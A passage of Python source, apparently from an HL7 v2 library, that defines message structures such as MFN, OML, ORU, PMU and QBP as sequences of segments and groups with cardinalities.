('MFN_M09_MF_TEST_CATEGORICAL', GROUPS['MFN_M09_MF_TEST_CATEGORICAL'], (1, -1), 'GRP'),)),
'MFN_M10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M10_MF_TEST_BATTERIES', GROUPS['MFN_M10_MF_TEST_BATTERIES'], (1, -1), 'GRP'),)),
'MFN_M11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M11_MF_TEST_CALCULATED', GROUPS['MFN_M11_MF_TEST_CALCULATED'], (1, -1), 'GRP'),)),
'MFN_M12': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M12_MF_OBS_ATTRIBUTES', GROUPS['MFN_M12_MF_OBS_ATTRIBUTES'], (1, -1), 'GRP'),)),
'MFN_M13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFE', SEGMENTS['MFE'], (1, -1), 'SEG'),)),
'MFN_M15': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_M15_MF_INV_ITEM', GROUPS['MFN_M15_MF_INV_ITEM'], (1, -1), 'GRP'),)),
'MFN_Znn': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFN_ZNN_MF_SITE_DEFINED', GROUPS['MFN_ZNN_MF_SITE_DEFINED'], (1, -1), 'GRP'),)),
'MFQ_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M01_MF_QUERY', GROUPS['MFR_M01_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M04_MF_QUERY', GROUPS['MFR_M04_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M05_MF_QUERY', GROUPS['MFR_M05_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M06_MF_QUERY', GROUPS['MFR_M06_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'MFR_M07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('MFI', SEGMENTS['MFI'], (1, 1), 'SEG'),
('MFR_M07_MF_QUERY', GROUPS['MFR_M07_MF_QUERY'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'NMD_N02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
                 ('NMD_N02_CLOCK_AND_STATS_WITH_NOTES', GROUPS['NMD_N02_CLOCK_AND_STATS_WITH_NOTES'], (1, -1), 'GRP'),)),
'NMQ_N01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NMQ_N01_QRY_WITH_DETAIL', GROUPS['NMQ_N01_QRY_WITH_DETAIL'], (0, 1), 'GRP'),
('NMQ_N01_CLOCK_AND_STATISTICS', GROUPS['NMQ_N01_CLOCK_AND_STATISTICS'], (1, -1), 'GRP'),)),
'NMR_N01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (0, 1), 'SEG'),
('NMR_N01_CLOCK_AND_STATS_WITH_NOTES_ALT', GROUPS['NMR_N01_CLOCK_AND_STATS_WITH_NOTES_ALT'], (1, -1),
'GRP'),)),
'OMB_O27': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMB_O27_PATIENT', GROUPS['OMB_O27_PATIENT'], (0, 1), 'GRP'),
('OMB_O27_ORDER', GROUPS['OMB_O27_ORDER'], (1, -1), 'GRP'),)),
'OMD_O03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMD_O03_PATIENT', GROUPS['OMD_O03_PATIENT'], (0, 1), 'GRP'),
('OMD_O03_ORDER_DIET', GROUPS['OMD_O03_ORDER_DIET'], (1, -1), 'GRP'),
('OMD_O03_ORDER_TRAY', GROUPS['OMD_O03_ORDER_TRAY'], (0, -1), 'GRP'),)),
'OMG_O19': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMG_O19_PATIENT', GROUPS['OMG_O19_PATIENT'], (0, 1), 'GRP'),
('OMG_O19_ORDER', GROUPS['OMG_O19_ORDER'], (1, -1), 'GRP'),)),
'OMI_O23': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMI_O23_PATIENT', GROUPS['OMI_O23_PATIENT'], (0, 1), 'GRP'),
('OMI_O23_ORDER', GROUPS['OMI_O23_ORDER'], (1, -1), 'GRP'),)),
'OML_O21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OML_O21_PATIENT', GROUPS['OML_O21_PATIENT'], (0, 1), 'GRP'),
('OML_O21_ORDER', GROUPS['OML_O21_ORDER'], (1, -1), 'GRP'),)),
'OML_O33': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OML_O33_PATIENT', GROUPS['OML_O33_PATIENT'], (0, 1), 'GRP'),
('OML_O33_SPECIMEN', GROUPS['OML_O33_SPECIMEN'], (1, -1), 'GRP'),)),
'OML_O35': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OML_O35_PATIENT', GROUPS['OML_O35_PATIENT'], (0, 1), 'GRP'),
('OML_O35_SPECIMEN', GROUPS['OML_O35_SPECIMEN'], (1, -1), 'GRP'),)),
'OMN_O07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMN_O07_PATIENT', GROUPS['OMN_O07_PATIENT'], (0, 1), 'GRP'),
('OMN_O07_ORDER', GROUPS['OMN_O07_ORDER'], (1, -1), 'GRP'),)),
'OMP_O09': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMP_O09_PATIENT', GROUPS['OMP_O09_PATIENT'], (0, 1), 'GRP'),
('OMP_O09_ORDER', GROUPS['OMP_O09_ORDER'], (1, -1), 'GRP'),)),
'OMS_O05': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('OMS_O05_PATIENT', GROUPS['OMS_O05_PATIENT'], (0, 1), 'GRP'),
('OMS_O05_ORDER', GROUPS['OMS_O05_ORDER'], (1, -1), 'GRP'),)),
'ORB_O28': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORB_O28_RESPONSE', GROUPS['ORB_O28_RESPONSE'], (0, 1), 'GRP'),)),
'ORD_O04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORD_O04_RESPONSE', GROUPS['ORD_O04_RESPONSE'], (0, 1), 'GRP'),)),
'ORF_R04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('ORF_R04_QUERY_RESPONSE', GROUPS['ORF_R04_QUERY_RESPONSE'], (1, -1), 'GRP'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ORG_O20': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORG_O20_RESPONSE', GROUPS['ORG_O20_RESPONSE'], (0, 1), 'GRP'),)),
'ORI_O24': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORI_O24_RESPONSE', GROUPS['ORI_O24_RESPONSE'], (0, 1), 'GRP'),)),
'ORL_O22': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORL_O22_RESPONSE', GROUPS['ORL_O22_RESPONSE'], (0, 1), 'GRP'),)),
'ORL_O34': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORL_O34_RESPONSE', GROUPS['ORL_O34_RESPONSE'], (0, 1), 'GRP'),)),
'ORL_O36': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORL_O36_RESPONSE', GROUPS['ORL_O36_RESPONSE'], (0, 1), 'GRP'),)),
'ORM_O01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORM_O01_PATIENT', GROUPS['ORM_O01_PATIENT'], (0, 1), 'GRP'),
('ORM_O01_ORDER', GROUPS['ORM_O01_ORDER'], (1, -1), 'GRP'),)),
'ORN_O08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORN_O08_RESPONSE', GROUPS['ORN_O08_RESPONSE'], (0, 1), 'GRP'),)),
'ORP_O10': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORP_O10_RESPONSE', GROUPS['ORP_O10_RESPONSE'], (0, 1), 'GRP'),)),
'ORR_O02': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORR_O02_RESPONSE', GROUPS['ORR_O02_RESPONSE'], (0, 1), 'GRP'),)),
'ORS_O06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORS_O06_RESPONSE', GROUPS['ORS_O06_RESPONSE'], (0, 1), 'GRP'),)),
'ORU_R01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('ORU_R01_PATIENT_RESULT', GROUPS['ORU_R01_PATIENT_RESULT'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'ORU_R30': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('ORU_R30_VISIT', GROUPS['ORU_R30_VISIT'], (0, 1), 'GRP'),
('ORC', SEGMENTS['ORC'], (1, 1), 'SEG'),
('OBR', SEGMENTS['OBR'], (1, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('ORU_R30_TIMING_QTY', GROUPS['ORU_R30_TIMING_QTY'], (0, -1), 'GRP'),
('ORU_R30_OBSERVATION', GROUPS['ORU_R30_OBSERVATION'], (1, -1), 'GRP'),)),
'OSQ_Q06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OSR_Q06': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('QRF', SEGMENTS['QRF'], (0, 1), 'SEG'),
('OSR_Q06_RESPONSE', GROUPS['OSR_Q06_RESPONSE'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R21': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R21_PATIENT', GROUPS['OUL_R21_PATIENT'], (0, 1), 'GRP'),
('OUL_R21_VISIT', GROUPS['OUL_R21_VISIT'], (0, 1), 'GRP'),
('OUL_R21_ORDER_OBSERVATION', GROUPS['OUL_R21_ORDER_OBSERVATION'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R22': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R22_PATIENT', GROUPS['OUL_R22_PATIENT'], (0, 1), 'GRP'),
('OUL_R22_VISIT', GROUPS['OUL_R22_VISIT'], (0, 1), 'GRP'),
('OUL_R22_SPECIMEN', GROUPS['OUL_R22_SPECIMEN'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R23': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R23_PATIENT', GROUPS['OUL_R23_PATIENT'], (0, 1), 'GRP'),
('OUL_R23_VISIT', GROUPS['OUL_R23_VISIT'], (0, 1), 'GRP'),
('OUL_R23_SPECIMEN', GROUPS['OUL_R23_SPECIMEN'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'OUL_R24': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, 1), 'SEG'),
('OUL_R24_PATIENT', GROUPS['OUL_R24_PATIENT'], (0, 1), 'GRP'),
('OUL_R24_VISIT', GROUPS['OUL_R24_VISIT'], (0, 1), 'GRP'),
('OUL_R24_ORDER', GROUPS['OUL_R24_ORDER'], (1, -1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'PEX_P07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PD1', SEGMENTS['PD1'], (0, 1), 'SEG'),
('NTE', SEGMENTS['NTE'], (0, -1), 'SEG'),
('PEX_P07_VISIT', GROUPS['PEX_P07_VISIT'], (0, 1), 'GRP'),
('PEX_P07_EXPERIENCE', GROUPS['PEX_P07_EXPERIENCE'], (1, -1), 'GRP'),)),
'PGL_PC6': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PGL_PC6_PATIENT_VISIT', GROUPS['PGL_PC6_PATIENT_VISIT'], (0, 1), 'GRP'),
('PGL_PC6_GOAL', GROUPS['PGL_PC6_GOAL'], (1, -1), 'GRP'),)),
'PMU_B01': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, -1), 'SEG'),
('ORG', SEGMENTS['ORG'], (0, -1), 'SEG'),
('AFF', SEGMENTS['AFF'], (0, -1), 'SEG'),
('LAN', SEGMENTS['LAN'], (0, -1), 'SEG'),
('EDU', SEGMENTS['EDU'], (0, -1), 'SEG'),
('CER', SEGMENTS['CER'], (0, -1), 'SEG'),)),
'PMU_B03': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),)),
'PMU_B04': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, -1), 'SEG'),
('ORG', SEGMENTS['ORG'], (0, -1), 'SEG'),)),
'PMU_B07': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, 1), 'SEG'),
('PMU_B07_CERTIFICATE', GROUPS['PMU_B07_CERTIFICATE'], (0, -1), 'GRP'),)),
'PMU_B08': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('EVN', SEGMENTS['EVN'], (1, 1), 'SEG'),
('STF', SEGMENTS['STF'], (1, 1), 'SEG'),
('PRA', SEGMENTS['PRA'], (0, 1), 'SEG'),
('CER', SEGMENTS['CER'], (0, -1), 'SEG'),)),
'PPG_PCG': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PPG_PCG_PATIENT_VISIT', GROUPS['PPG_PCG_PATIENT_VISIT'], (0, 1), 'GRP'),
('PPG_PCG_PATHWAY', GROUPS['PPG_PCG_PATHWAY'], (1, -1), 'GRP'),)),
'PPP_PCB': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PPP_PCB_PATIENT_VISIT', GROUPS['PPP_PCB_PATIENT_VISIT'], (0, 1), 'GRP'),
('PPP_PCB_PATHWAY', GROUPS['PPP_PCB_PATHWAY'], (1, -1), 'GRP'),)),
'PPR_PC1': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('PID', SEGMENTS['PID'], (1, 1), 'SEG'),
('PPR_PC1_PATIENT_VISIT', GROUPS['PPR_PC1_PATIENT_VISIT'], (0, 1), 'GRP'),
('PPR_PC1_PROBLEM', GROUPS['PPR_PC1_PROBLEM'], (1, -1), 'GRP'),)),
'PPT_PCL': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PPT_PCL_PATIENT', GROUPS['PPT_PCL_PATIENT'], (1, -1), 'GRP'),)),
'PPV_PCA': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PPV_PCA_PATIENT', GROUPS['PPV_PCA_PATIENT'], (1, -1), 'GRP'),)),
'PRR_PC5': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PRR_PC5_PATIENT', GROUPS['PRR_PC5_PATIENT'], (1, -1), 'GRP'),)),
'PTR_PCF': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, -1), 'SEG'),
('QAK', SEGMENTS['QAK'], (0, 1), 'SEG'),
('QRD', SEGMENTS['QRD'], (1, 1), 'SEG'),
('PTR_PCF_PATIENT', GROUPS['PTR_PCF_PATIENT'], (1, -1), 'GRP'),)),
'QBP_K13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('MSA', SEGMENTS['MSA'], (1, 1), 'SEG'),
('ERR', SEGMENTS['ERR'], (0, 1), 'SEG'),
('QAK', SEGMENTS['QAK'], (1, 1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('QBP_K13_ROW_DEFINITION', GROUPS['QBP_K13_ROW_DEFINITION'], (0, 1), 'GRP'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q11': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
('QPD', SEGMENTS['QPD'], (1, 1), 'SEG'),
('RCP', SEGMENTS['RCP'], (1, 1), 'SEG'),
('DSC', SEGMENTS['DSC'], (0, 1), 'SEG'),)),
'QBP_Q13': ('sequence',
(('MSH', SEGMENTS['MSH'], (1, 1), 'SEG'),
('SFT', SEGMENTS['SFT'], (0, -1), 'SEG'),
